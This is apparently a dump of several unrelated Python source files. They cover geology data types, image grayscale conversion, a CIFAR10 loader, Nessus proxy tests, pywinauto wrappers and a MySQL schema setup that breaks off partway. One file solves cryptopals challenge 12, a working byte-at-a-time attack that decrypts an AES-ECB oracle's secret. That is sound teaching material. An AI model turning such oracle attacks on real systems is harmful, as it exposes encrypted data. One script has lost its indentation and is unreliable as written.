    # Field metadata consumed by the pydov framework (order matters for
    # the resulting dataframe columns).
    _fields = [{
        'name': 'diepte_laag_van',
        'source': 'xml',
        'sourcefield': '/van',
        'definition': 'Diepte van de bovenkant van de laag lithologische '
                      'beschrijving in meter.',
        'type': 'float',
        'notnull': False
    }, {
        'name': 'diepte_laag_tot',
        'source': 'xml',
        'sourcefield': '/tot',
        'definition': 'Diepte van de onderkant van de laag lithologische '
                      'beschrijving in meter.',
        'type': 'float',
        'notnull': False
    }, {
        'name': 'beschrijving',
        'source': 'xml',
        'sourcefield': '/beschrijving',
        'definition': 'Lithologische beschrijving van de laag in vrije tekst '
                      '(onbeperkt in lengte)',
        'type': 'string',
        'notnull': False
    }]
    def __init__(self):
        """Initialisation."""
        super(LithologischeBeschrijvingLaag, self).__init__(
            'lithologische_beschrijving_laag')
    @classmethod
    def from_xml_element(cls, element):
        """Build an instance of this subtype from a single XML element.

        Parameters
        ----------
        element : etree.Element
            XML element representing a single record of this subtype.

        Returns
        -------
        LithologischeBeschrijvingLaag
            Instance populated with the data parsed from `element`.
        """
        laag = LithologischeBeschrijvingLaag()
        # Parse every declared field from the XML element, converting to
        # the declared type.
        for field in cls.get_fields().values():
            laag.data[field['name']] = laag._parse(
                func=element.findtext,
                xpath=field['sourcefield'],
                namespace=None,
                returntype=field.get('type', None)
            )
        return laag
class LithologischeBeschrijvingen(AbstractDovType):
    """Class representing the DOV data type for 'lithologische
    beschrijvingen' interpretations."""
    _subtypes = [LithologischeBeschrijvingLaag]
    # Field metadata consumed by the pydov framework (order matters for
    # the resulting dataframe columns). Unlike the sibling interpretation
    # types, this one is always linked to a borehole, so pkey_boring comes
    # straight from the WFS Proeffiche field.
    _fields = [{
        'name': 'pkey_interpretatie',
        'source': 'wfs',
        'sourcefield': 'Interpretatiefiche',
        'type': 'string'
    }, {
        'name': 'pkey_boring',
        'source': 'wfs',
        'type': 'string',
        'sourcefield': 'Proeffiche',
    }, {
        'name': 'betrouwbaarheid_interpretatie',
        'source': 'wfs',
        'sourcefield': 'Betrouwbaarheid',
        'type': 'string'
    }, {
        'name': 'x',
        'source': 'wfs',
        'sourcefield': 'X_mL72',
        'type': 'float'
    }, {
        'name': 'y',
        'source': 'wfs',
        'sourcefield': 'Y_mL72',
        'type': 'float'
    }]
    def __init__(self, pkey):
        """Initialisation.

        Parameters
        ----------
        pkey : str
            Permanent key of the 'Lithologische beschrijvingen', being a URI
            of the form
            `https://www.dov.vlaanderen.be/data/interpretaties/<id>`.

        """
        super(LithologischeBeschrijvingen, self).__init__(
            'interpretatie', pkey)
    @classmethod
    def from_wfs_element(cls, feature, namespace):
        """Build 'LithologischeBeschrijvingen' instance from a WFS feature
        element.

        Parameters
        ----------
        feature : etree.Element
            XML element representing a single record of the WFS layer.
        namespace : str
            Namespace associated with this WFS featuretype.

        Returns
        -------
        LithologischeBeschrijvingen : LithologischeBeschrijvingen
            An instance of this class populated with the data from the WFS
            element.

        """
        lithobes = LithologischeBeschrijvingen(
            feature.findtext('./{%s}Interpretatiefiche' % namespace))
        # All fields come from the WFS record; no custom handling needed.
        for field in cls.get_fields(source=('wfs',)).values():
            lithobes.data[field['name']] = cls._parse(
                func=feature.findtext,
                xpath=field['sourcefield'],
                namespace=namespace,
                returntype=field.get('type', None)
            )
        return lithobes
| StarcoderdataPython |
1604564 | from matplotlib import pyplot as plt
import matplotlib.image as mpimg
import numpy
#image = "ct34"
image_ext = ".jpg"
image_list = ["ct1","ct3","ct4","ct5","ct6","ct7","ct8","ct9","ct10","ct11","ct12","ct13",
"ct14","ct15","ct16","ct17","ct18","ct19","ct20","ct21","ct22","ct23","ct24","ct25","ct26",
"ct27","ct28","ct29","ct30","ct31","ct32","ct33","ct34", "ct35"]
methods = ["BT601", "BT709"]
method = "BT601"
for current_image in image_list:
# img = mpimg.imread(image + image_ext) #Get the image
img = mpimg.imread(current_image + image_ext)
for method in methods:
R, G, B = img[:,:,0], img[:,:,1], img[:,:,2] #Split RGB channels
if method == "BT601":
imgGray = 0.2989 * R + 0.5870 * G + 0.1140 * B #Convert all channels to grayscale.
elif method == "BT709":
imgGray = 0.2126 * R + 0.7152 * G + 0.0722 * B
elif method == "Decomposition_MAX":
imgGray = numpy.copy(img)
for ix in range(len(img)):
for iy in range(len(img[ix])):
val = max(img[ix, iy, 0], img[ix, iy, 1], img[ix, iy, 2]) #Determine max value of channels.
imgGray[ix, iy, 0] = val #Set all channels to the same value.
imgGray[ix, iy, 1] = val
imgGray[ix, iy, 2] = val
elif method == "Decomposition_MIN":
imgGray = numpy.copy(img)
for ix in range(len(img)):
for iy in range(len(img[ix])):
val = min(img[ix, iy, 0], img[ix, iy, 1], img[ix, iy, 2]) #Determine min value of channels.
imgGray[ix, iy, 0] = val #Set all channels to the same value.
imgGray[ix, iy, 1] = val
imgGray[ix, iy, 2] = val
plt.title(current_image + "_" + method + image_ext)
fig = plt.gcf()
fig.canvas.set_window_title(current_image + "_" + method + image_ext)
mpimg.imsave(current_image + "_" + method + image_ext, imgGray, cmap='gray')
# plt.imshow(imgGray, cmap='gray') #Show the image.
# plt.show()
| StarcoderdataPython |
7438 | # Copyright 2019 The FastEstimator Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from typing import Tuple
import tensorflow as tf
from fastestimator.dataset.numpy_dataset import NumpyDataset
def load_data(image_key: str = "x", label_key: str = "y") -> Tuple[NumpyDataset, NumpyDataset]:
    """Load and return the CIFAR10 dataset.

    Please consider using the ciFAIR10 dataset instead. CIFAR10 contains duplicates between its train and test sets.

    Args:
        image_key: The key for image.
        label_key: The key for label.

    Returns:
        (train_data, eval_data)
    """
    # Warn (in yellow) that ciFAIR10 is the better choice.
    print("\033[93m {}\033[00m".format("FastEstimator-Warn: Consider using the ciFAIR10 dataset instead."))
    (train_x, train_y), (eval_x, eval_y) = tf.keras.datasets.cifar10.load_data()
    return (NumpyDataset({image_key: train_x, label_key: train_y}),
            NumpyDataset({image_key: eval_x, label_key: eval_y}))
| StarcoderdataPython |
1633175 | <filename>cryptopals/set2/challenge12.py
#!/usr/bin/env python3
import base64
from typing import Tuple
from functions.aes import gen_random_bytes, AESCipher, pkcs7_pad
# Expected plaintext recovered by the attack (checked in __main__).
RESULT = b"""Rollin' in my 5.0
With my rag-top down so my hair can blow
The girlies on standby waving just to say hi
Did you stop? No, I just drove by
"""
# Unknown suffix the oracle appends before encrypting.
# NOTE(review): the base64 payload below looks redacted ("<KEY>"
# placeholders) -- as-is it will not decode to RESULT; restore the
# original base64 data.
_SECRET = base64.b64decode(
    "<KEY>"
    "<KEY>"
    "<KEY>"
    "YnkK"
)
# ECB oracle with one fixed random key, shared by every call below.
_ecb = AESCipher(AESCipher.MODE_ECB, gen_random_bytes(16))
def _encrypt_it(bytes_: bytes) -> bytes:
    """Encryption oracle: AES-ECB(pad(attacker_bytes || _SECRET))."""
    pt = bytes_ + _SECRET
    ct = _ecb.encrypt(pkcs7_pad(pt))
    return ct
def _get_info() -> Tuple[int, int]:
    """Discover the oracle's block size and the secret's byte length.

    Feeds the oracle a growing zero-byte prefix until the ciphertext
    length jumps: the jump equals the block size, and the prefix length
    at that moment tells how much PKCS#7 padding the bare secret needed,
    which yields the secret's exact length.

    Returns
    -------
    (block_size, data_len) : Tuple[int, int]
    """
    length_without_padding = len(_encrypt_it(bytes()))
    length_with_padding = length_without_padding
    padding = bytes()
    # Grow the prefix one byte at a time until a new block is added.
    while length_with_padding == length_without_padding:
        padding += b"\x00"
        length_with_padding = len(_encrypt_it(padding))
    block_size = length_with_padding - length_without_padding
    # len(padding) bytes were needed to fill the last block, so the
    # secret occupies (block_size - len(padding)) bytes of it -- unless a
    # full extra block of padding was needed (secret is block-aligned).
    if len(padding) < block_size:
        data_len = length_without_padding - len(padding)
    else:
        data_len = length_without_padding - block_size
    return block_size, data_len
def challenge12() -> bytes:
    """Recover the oracle's secret via byte-at-a-time ECB decryption.

    For each unknown byte: shrink the attacker prefix by one so the next
    secret byte slides into the last position of a known block, build a
    dictionary of all 256 possible ciphertext blocks, and match it
    against the oracle's real output.
    """
    block_size, data_len = _get_info()
    # Number of blocks the secret spans (ceiling division).
    data_num_block = data_len // block_size + (data_len % block_size > 0)
    padding = b"\x00" * data_num_block * block_size
    # Sliding window holding the last (block_size - 1) known bytes.
    data_block = b"\x00" * block_size
    data = bytes()
    while len(data) < data_len:
        # Shorten both by one so the next unknown byte becomes the last
        # byte of the target block.
        padding = padding[1:]
        data_block = data_block[1:]
        # Dictionary: first ciphertext block for every candidate byte.
        possible_blocks = {
            _encrypt_it(data_block + bytes([i]))[:block_size]: data_block + bytes([i])
            for i in range(256)
        }
        # Target block of the real ciphertext containing the unknown byte.
        ct = _encrypt_it(padding)[
            (data_num_block - 1) * block_size : data_num_block * block_size
        ]
        for pb in possible_blocks.items():
            if pb[0] == ct:
                # The matching candidate's final byte is the secret byte.
                byte = bytes([pb[1][block_size - 1]])
                data_block += byte
                data += byte
                break
    return data
return data
if __name__ == "__main__":
    # Run the attack and verify it recovers the known plaintext.
    res = challenge12()
    assert res == RESULT, "The result does not match the expected value"
    print("Ok")
| StarcoderdataPython |
3387870 | import pytest
import responses
@responses.activate
def test_proxy_edit(nessus):
    """Editing proxy settings should PUT to /settings/network/proxy.

    The mocked endpoint returns an empty 200; the test passes when the
    client issues exactly this request without raising.
    """
    responses.add(responses.PUT,
                  'https://localhost:8834/settings/network/proxy'
                  )
    nessus.proxy.edit(proxy='proxy.company.com',
                      proxy_auth='auto',
                      proxy_password='password',
                      proxy_username='username',
                      proxy_port=8080,
                      user_agent='Proxy UserAgent'
                      )
@responses.activate
def test_proxy_details(nessus):
    """Fetching proxy details should GET /settings/network/proxy and
    return the JSON payload as a dict.

    NOTE(review): the '<PASSWORD>' value below looks like a redaction
    placeholder left by dataset scrubbing; any dummy string would do.
    """
    responses.add(responses.GET,
                  'https://localhost:8834/settings/network/proxy',
                  json={
                      'proxy': 'proxy.company.com',
                      'proxy_auth': 'basic',
                      'proxy_password': '<PASSWORD>',
                      'proxy_username': 'user',
                      'proxy_port': 8080,
                      'user_agent': 'Awesome Useragent'
                  })
    resp = nessus.proxy.details()
    assert isinstance(resp, dict)
    assert resp['proxy'] == 'proxy.company.com'
| StarcoderdataPython |
115216 | # GUI Application automation and testing library
# Copyright (C) 2006 <NAME>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public License
# as published by the Free Software Foundation; either version 2.1
# of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc.,
# 59 Temple Place,
# Suite 330,
# Boston, MA 02111-1307 USA
"""Wrap"""
__revision__ = "$Rev: 439 $"
try:
import pywinauto
except ImportError:
import sys
sys.path.append("..")
from .win32structures import RECT, LOGFONTW
#====================================================================
class func_wrapper(object):
    """Wrap a value so that calling the wrapper -- with any arguments --
    simply returns that value.

    Lets plain dictionary values stand in for the method-style accessors
    of live control wrappers (see ControlProps.__getattr__).
    """

    def __init__(self, value):
        # The value handed back by every call.
        self.value = value

    def __call__(self, *args, **kwargs):
        """Ignore all arguments and return the saved value."""
        return self.value
#====================================================================
class ControlProps(dict):
    """Wrap controls read from a file to resemble hwnd controls.

    Attribute access falls back to dictionary keys: ``props.Foo`` returns
    a callable (func_wrapper) yielding ``props['Foo']`` -- or the first
    element of ``props['Foos']`` when only the plural key exists -- so
    these objects can stand in for live control wrappers whose accessors
    are methods.
    """
    def __init__(self, *args, **kwargs):
        dict.__init__(self, *args, **kwargs)
        # Reference control this one is matched against (see
        # SetReferenceControls); None until assigned.
        self.ref = None
        #self.MenuItems = []
    def __getattr__(self, attr):
        # if the key is not in the dictionary but the plural is
        if attr not in self and attr + "s" in self:
            # return the first element of the possible list item
            return func_wrapper(self[attr+'s'][0])
        try:
            return func_wrapper(self[attr])
        except KeyError:
            # __getattr__ must raise AttributeError (not KeyError) for
            # missing names, otherwise hasattr()/getattr(obj, n, default)
            # propagate the KeyError instead of handling the miss.
            raise AttributeError(attr)
    def WindowText(self):
        """Return the first text of the control."""
        return self['Texts'][0]
    def HasStyle(self, style):
        """True if every bit of `style` is set in the control's style."""
        return self['Style'] & style == style
    def HasExStyle(self, exstyle):
        """True if every bit of `exstyle` is set in the extended style."""
        return self['ExStyle'] & exstyle == exstyle
#====================================================================
def GetMenuBlocks(ctrls):
    """Collect the separate menu blocks of every control that has menus."""
    allMenuBlocks = []
    for ctrl in ctrls:
        if 'MenuItems' not in ctrl:
            continue
        # each control may contribute several separate menu blocks
        allMenuBlocks.extend(MenuBlockAsControls(ctrl.MenuItems()))
    return allMenuBlocks
#====================================================================
def MenuBlockAsControls(menuItems, parentage = None):
    """Return the menu blocks for `menuItems` as lists of pseudo controls.

    Each sub menu contributes its own block; sub-menu blocks are emitted
    before the block of the level that contains them.

    Args:
        menuItems: list of menu item property dictionaries.
        parentage: internal recursion accumulator of ancestor item texts;
            callers should not pass it.
    """
    # Fresh list per call -- the original used the mutable default
    # `parentage = []`, which is shared across calls.
    if parentage is None:
        parentage = []
    blocks = []
    curBlock = []
    for item in menuItems:
        # convert the item so it looks like a control and append it to
        # the current menu block
        curBlock.append(MenuItemAsControl(item))
        # If the item has a sub menu, recurse into it with this item
        # added to the path. (The old unused `itemPath` computation was
        # removed -- it was already flagged by a TODO.)
        if 'MenuItems' in item:
            parentage.append(item['Text'])
            blocks.extend(
                MenuBlockAsControls(
                    item['MenuItems']['MenuItems'], parentage))
            # done with that sub menu - pop the current item off the path
            del(parentage[-1])
    # add the current block to the list of blocks
    blocks.append(curBlock)
    return blocks
#====================================================================
def MenuItemAsControl(menuItem):
    """Return a ControlProps pseudo control built from a menu item."""
    ctrl = ControlProps()
    # properties carried over from the menu item itself
    ctrl["Texts"] = [menuItem['Text'], ]
    ctrl["ControlID"] = menuItem['ID']
    ctrl["Type"] = menuItem['Type']
    ctrl["State"] = menuItem['State']
    ctrl["Class"] = "MenuItem"
    ctrl["FriendlyClassName"] = "MenuItem"
    # the rest don't matter for menu items - plain defaults suffice
    defaults = {
        "Rectangle": RECT(0, 0, 999, 999),
        "Fonts": [LOGFONTW(), ],
        "ClientRects": [RECT(0, 0, 999, 999), ],
        "ContextHelpID": 0,
        "UserData": 0,
        "Style": 0,
        "ExStyle": 0,
        "IsVisible": 1,
    }
    ctrl.update(defaults)
    return ctrl
#====================================================================
def SetReferenceControls(controls, refControls):
    """Set the reference controls for the controls passed in

    This does some minor checking as following:

      * test that there are the same number of reference controls as
        controls - fails with an exception if there are not
      * test if all the ID's are the same or not

    Returns a bit field: 1 is always set, +2 when every control ID
    matches its reference, +4 when every control class matches.
    """
    # numbers of controls must be the same (though in future I could imagine
    # relaxing this constraint)
    if len(controls) != len(refControls):
        raise RuntimeError(
            "Numbers of controls on ref. dialog does not match Loc. dialog")

    # pair each control with its reference
    for ctrl, ref_ctrl in zip(controls, refControls):
        ctrl.ref = ref_ctrl

    toRet = 1
    allIDsSameFlag = 2
    allClassesSameFlag = 4

    # do all the control ids match?
    if [c.ControlID() for c in controls] == \
            [c.ControlID() for c in refControls]:
        toRet += allIDsSameFlag

    # do all the control classes match?
    if [c.Class() for c in controls] == \
            [c.Class() for c in refControls]:
        toRet += allClassesSameFlag

    return toRet
##====================================================================
#class ControlProps(dict):
# #----------------------------------------------------------------
# def __init__(self, props = {}):
# # default to having menuItems for all things
# self.MenuItems = []
#
# self.update(props)
# #for x in props:
# #self[x] = props[x]
#
# if hasattr(props, "handle"):
# self.__dict__['handle'] = props.handle
# else:
# self.__dict__['handle'] = None
#
# self.__dict__['ref'] = None
#
# #----------------------------------------------------------------
# # handles attribute access for dictionary items and
# # for plurals (e.g. if self.Fonts = [4, 2] then self.Font = 4)
# def __getattr__(self, key):
#
# # if the key is not in the dictionary but the plural is
# if key not in self and key + "s" in self:
#
# # try to get the first element of the possible list item
# try:
# return self[key + "s"][0]
# except TypeError, e:
# pass
#
# if key in self:
# return self[key]
#
# return self.__dict__[key]
#
# #----------------------------------------------------------------
# def __setattr__(self, key, value):
# if key in self.__dict__:
# self.__dict__[key] = value
# else:
# self[key] = value
#
# #----------------------------------------------------------------
# def HasStyle(self, flag):
# return self.Style & flag == flag
#
# #----------------------------------------------------------------
# def HasExStyle(self, flag):
# return self.ExStyle & flag == flag
#
#
| StarcoderdataPython |
28589 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Jan 09 22:25:07 2019
@author: arnaudhub
"""
#import pandas as pd
from sqlalchemy import create_engine
from sqlalchemy.sql import text
import configparser,os
from urllib import parse
#import sql.connector
# Read DB credentials from the user's config file. The context manager
# closes the handle -- the original passed a bare open() result to
# read_file() and leaked it.
config = configparser.ConfigParser()
with open(os.path.expanduser("~/Bureau/OBJDOMO.cnf")) as _cnf_file:
    config.read_file(_cnf_file)
DB = "OBJETDOMO_V13_1.1?charset=utf8"
CNF = "OBJDOMO"
engine = create_engine("mysql://%s:%s@%s/%s" % (config[CNF]['user'], parse.quote_plus(config[CNF]['password']), config[CNF]['host'], DB))
# Use the CNF section constant consistently (the password lookup had a
# corrupted '<PASSWORD>' placeholder as its section name, and the user
# lookup hard-coded the section literal).
user = config[CNF]['user']
password = config[CNF]['password']
import mysql.connector
from mysql.connector import Error
try:
    # Dedicated mysql.connector connection used to run the DDL below
    # (separate from the SQLAlchemy engine created above).
    connection = mysql.connector.connect(host="127.0.0.1",
                                         database="OBJETDOMO_V13_1.1",
                                         user=user,
                                         password=password)
    cursor = connection.cursor()
    # Save and relax unique/FK checks and the SQL mode so tables can be
    # (re)created in any order; the saved values are restored after the DDL.
    cursor.execute("""SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;""")
    cursor.execute("""SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;""")
    cursor.execute("""SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL,ALLOW_INVALID_DATES';""")
    # Full rebuild: drop and recreate the schema from scratch.
    cursor.execute("""DROP SCHEMA IF EXISTS `OBJETDOMO_V13_1.1`;""")
    print("DROP SCHEMA")
    cursor.execute("""CREATE SCHEMA IF NOT EXISTS `OBJETDOMO_V13_1.1` DEFAULT CHARACTER SET utf8 ;""")
    cursor.execute("""USE `OBJETDOMO_V13_1.1`;""")
    # Reference table: address types.
    cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_A_TYPE_ADRESSE_TAD` ;""")
    cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_A_TYPE_ADRESSE_TAD` (
  `TAD_ID` INT NOT NULL AUTO_INCREMENT,
  `TAD_LIBELLE` VARCHAR(45) NOT NULL,
  PRIMARY KEY (`TAD_ID`))
ENGINE = InnoDB;""")
    print("T_A_TYPE_ADRESSE_TAD Table created successfully ")
    # Reference table: gender labels.
    cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_R_GENRE_GEN` ;""")
    cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_R_GENRE_GEN` (
  `GEN_ID` INT NOT NULL AUTO_INCREMENT,
  `GEN_LIBELLE` VARCHAR(16) NOT NULL,
  PRIMARY KEY (`GEN_ID`))
ENGINE = InnoDB;""")
    print("T_R_GENRE_GEN Table created successfully ")
    # Reference table: person status.
    cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_A_STATUT_STT` ;""")
    cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_A_STATUT_STT` (
  `STT_ID` INT NOT NULL AUTO_INCREMENT,
  `STT_LIBELLE` VARCHAR(45) NOT NULL,
  `STT_TYPE` VARCHAR(45) NOT NULL,
  PRIMARY KEY (`STT_ID`))
ENGINE = InnoDB;""")
    print("T_A_STATUT_STT Table created successfully ")
    # Natural persons, with FKs to the gender and status reference tables.
    cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_E_PERSONNEPHYSIQUE_PRS` ;""")
    cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_E_PERSONNEPHYSIQUE_PRS` (
  `PRS_ID` INT NOT NULL AUTO_INCREMENT,
  `PRS_NOM` VARCHAR(40) NOT NULL,
  `PRS_PRENOM` VARCHAR(40) NOT NULL,
  `GEN_ID` INT NOT NULL,
  `PRS_NOTES` VARCHAR(300) NULL,
  `STT_ID` INT NOT NULL,
  PRIMARY KEY (`PRS_ID`),
  INDEX `fk_TE_PERSONNE_PRS_1_idx` (`GEN_ID` ASC),
  INDEX `fk_TE_PERSONNE_PRS_2_idx` (`STT_ID` ASC),
  INDEX `index4` (`PRS_NOM` ASC, `PRS_PRENOM` ASC),
  CONSTRAINT `fk_TE_PERSONNE_PRS_1`
    FOREIGN KEY (`GEN_ID`)
    REFERENCES `OBJETDOMO_V13_1.1`.`T_R_GENRE_GEN` (`GEN_ID`)
    ON DELETE NO ACTION
    ON UPDATE NO ACTION,
  CONSTRAINT `fk_TE_PERSONNE_PRS_2`
    FOREIGN KEY (`STT_ID`)
    REFERENCES `OBJETDOMO_V13_1.1`.`T_A_STATUT_STT` (`STT_ID`)
    ON DELETE NO ACTION
    ON UPDATE NO ACTION)
ENGINE = InnoDB;""")
    print('T_E_PERSONNEPHYSIQUE_PRS Table created successfully')
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_A_VILLE_CITY` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_A_VILLE_CITY` (
`CITY_ID` INT NOT NULL AUTO_INCREMENT,
`CITY_CODEPOSTAL` CHAR(5) NOT NULL,
`CITY_COMMUNE` VARCHAR(60) NOT NULL,
PRIMARY KEY (`CITY_ID`),
INDEX `index2` (`CITY_CODEPOSTAL` ASC, `CITY_COMMUNE` ASC))
ENGINE = InnoDB;""")
print("T_A_VILLE_CITY Table created successfully ")
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_E_ADRESSEPOSTALE_ADR` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_E_ADRESSEPOSTALE_ADR` (
`ADR_ID` INT NOT NULL AUTO_INCREMENT,
`ADR_VOIEPRINCIPALE` VARCHAR(38) NOT NULL,
`ADR_COMPLEMENTIDENTIFICATION` VARCHAR(38) NOT NULL,
`CITY_ID` INT NOT NULL,
`TAD_ID` INT NOT NULL COMMENT ' ',
PRIMARY KEY (`ADR_ID`),
INDEX `fk_TE_ADRESSE_ADR_1_idx` (`TAD_ID` ASC),
INDEX `fk_TE_ADRESSEPOSTALE_ADR_1_idx` (`CITY_ID` ASC),
CONSTRAINT `fk_TE_ADRESSE_ADR_1`
FOREIGN KEY (`TAD_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_A_TYPE_ADRESSE_TAD` (`TAD_ID`)
ON DELETE NO ACTION
ON UPDATE NO ACTION,
CONSTRAINT `fk_TE_ADRESSEPOSTALE_ADR_1`
FOREIGN KEY (`CITY_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_A_VILLE_CITY` (`CITY_ID`)
ON DELETE NO ACTION
ON UPDATE NO ACTION)
ENGINE = InnoDB;""")
print('T_E_ADRESSEPOSTALE_ADR Table created successfully')
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_R_TYPEPRODUIT_TPDT` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_R_TYPEPRODUIT_TPDT` (
`TPDT_ID` INT NOT NULL AUTO_INCREMENT,
`TPDT_CATEGORIE` VARCHAR(60) NULL,
PRIMARY KEY (`TPDT_ID`))
ENGINE = InnoDB;""")
print('T_R_TYPEPRODUIT_TPDT Table created successfully')
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_E_PRODUIT_PDT` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_E_PRODUIT_PDT` (
`PDT_SERIALNUMBER` INT NOT NULL AUTO_INCREMENT,
`PDT_NOM` VARCHAR(45) NOT NULL,
`PDT_MARQUE` VARCHAR(45) NOT NULL,
`PDT_VALEUR` VARCHAR(45) NOT NULL,
`PDT_HEURE` VARCHAR(45) NOT NULL,
`PDT_DUREE` VARCHAR(45) NOT NULL,
`PDT_SOURCE` VARCHAR(45) NOT NULL,
`PDT_REGLE` VARCHAR(45) NOT NULL,
`TPDT_ID` INT NOT NULL,
PRIMARY KEY (`PDT_SERIALNUMBER`),
INDEX `index2` (`PDT_NOM` ASC, `PDT_MARQUE` ASC),
INDEX `fk_TE_PRODUIT_PDT_1_idx` (`TPDT_ID` ASC),
CONSTRAINT `fk_TE_PRODUIT_PDT_1`
FOREIGN KEY (`TPDT_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_R_TYPEPRODUIT_TPDT` (`TPDT_ID`)
ON DELETE NO ACTION
ON UPDATE NO ACTION)
ENGINE = InnoDB;""")
print('T_E_PRODUIT_PDT Table created successfully')
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_R_AUTHENTIFICATION_AUTH` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_R_AUTHENTIFICATION_AUTH` (
`AUTH_ID` INT NOT NULL AUTO_INCREMENT,
`AUTH_USERNAME` VARCHAR(45) NOT NULL,
`AUTH_PASSWORD` VARCHAR(45) NOT NULL,
`PRS_ID` INT NOT NULL,
PRIMARY KEY (`AUTH_ID`),
INDEX `index2` (`AUTH_USERNAME` ASC, `AUTH_PASSWORD` ASC),
INDEX `fk_TR_AUTHENTIFICATION_AUTH_1_idx` (`PRS_ID` ASC),
CONSTRAINT `fk_TR_AUTHENTIFICATION_AUTH_1`
FOREIGN KEY (`PRS_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_E_PERSONNEPHYSIQUE_PRS` (`PRS_ID`)
ON DELETE NO ACTION
ON UPDATE NO ACTION)
ENGINE = InnoDB;""")
print('T_R_AUTHENTIFICATION_AUTH Table created successfully')
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_E_LOCALISATIONPRODUIT_LOC` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_E_LOCALISATIONPRODUIT_LOC` (
`LOC_ID` INT NOT NULL AUTO_INCREMENT,
`LOC_LIBELLE` VARCHAR(45) NOT NULL,
`LOC_TYPE` VARCHAR(45) NOT NULL,
`LOC_NOTES` VARCHAR(300) NULL,
PRIMARY KEY (`LOC_ID`),
INDEX `index2` (`LOC_LIBELLE` ASC, `LOC_TYPE` ASC))
ENGINE = InnoDB;""")
print('T_E_LOCALISATIONPRODUIT_LOC Table created successfully')
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_R_TYPEINTERVENTION_TPI` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_R_TYPEINTERVENTION_TPI` (
`TPI_ID` INT NOT NULL AUTO_INCREMENT,
`TPI_LIBELLE` VARCHAR(45) NOT NULL,
`TPI_TYPE` VARCHAR(45) NOT NULL,
PRIMARY KEY (`TPI_ID`),
INDEX `index2` (`TPI_LIBELLE` ASC, `TPI_TYPE` ASC))
ENGINE = InnoDB;""")
print('T_R_TYPEINTERVENTION_TPI Table created successfully')
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_A_AUTONOMIE_AUT` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_A_AUTONOMIE_AUT` (
`AUT_ID` INT NOT NULL AUTO_INCREMENT,
`AUT_DEPENDANCE` VARCHAR(5) NOT NULL,
`AUT_DEFINITION` VARCHAR(105) NOT NULL,
PRIMARY KEY (`AUT_ID`),
INDEX `index2` (`AUT_DEPENDANCE` ASC, `AUT_DEFINITION` ASC))
ENGINE = InnoDB;""")
print('T_A_AUTONOMIE_AUT Table created successfully')
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_R_BENEFICIAIRE_CTT` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_R_BENEFICIAIRE_CTT` (
`CTT_ID` INT NOT NULL AUTO_INCREMENT,
`CTT_INTITULECONTRAT` VARCHAR(45) NOT NULL,
`CTT_REFCONTRAT` VARCHAR(45) NOT NULL,
`AUT_ID` INT NOT NULL,
`CTT_DEBUTCONTRAT` DATE NOT NULL,
`CTT_DATENAISSANCEBENEFICIAIRE` DATE NOT NULL,
`CTT_TEL` VARCHAR(45) NULL,
`PRS_ID` INT NOT NULL,
PRIMARY KEY (`CTT_ID`),
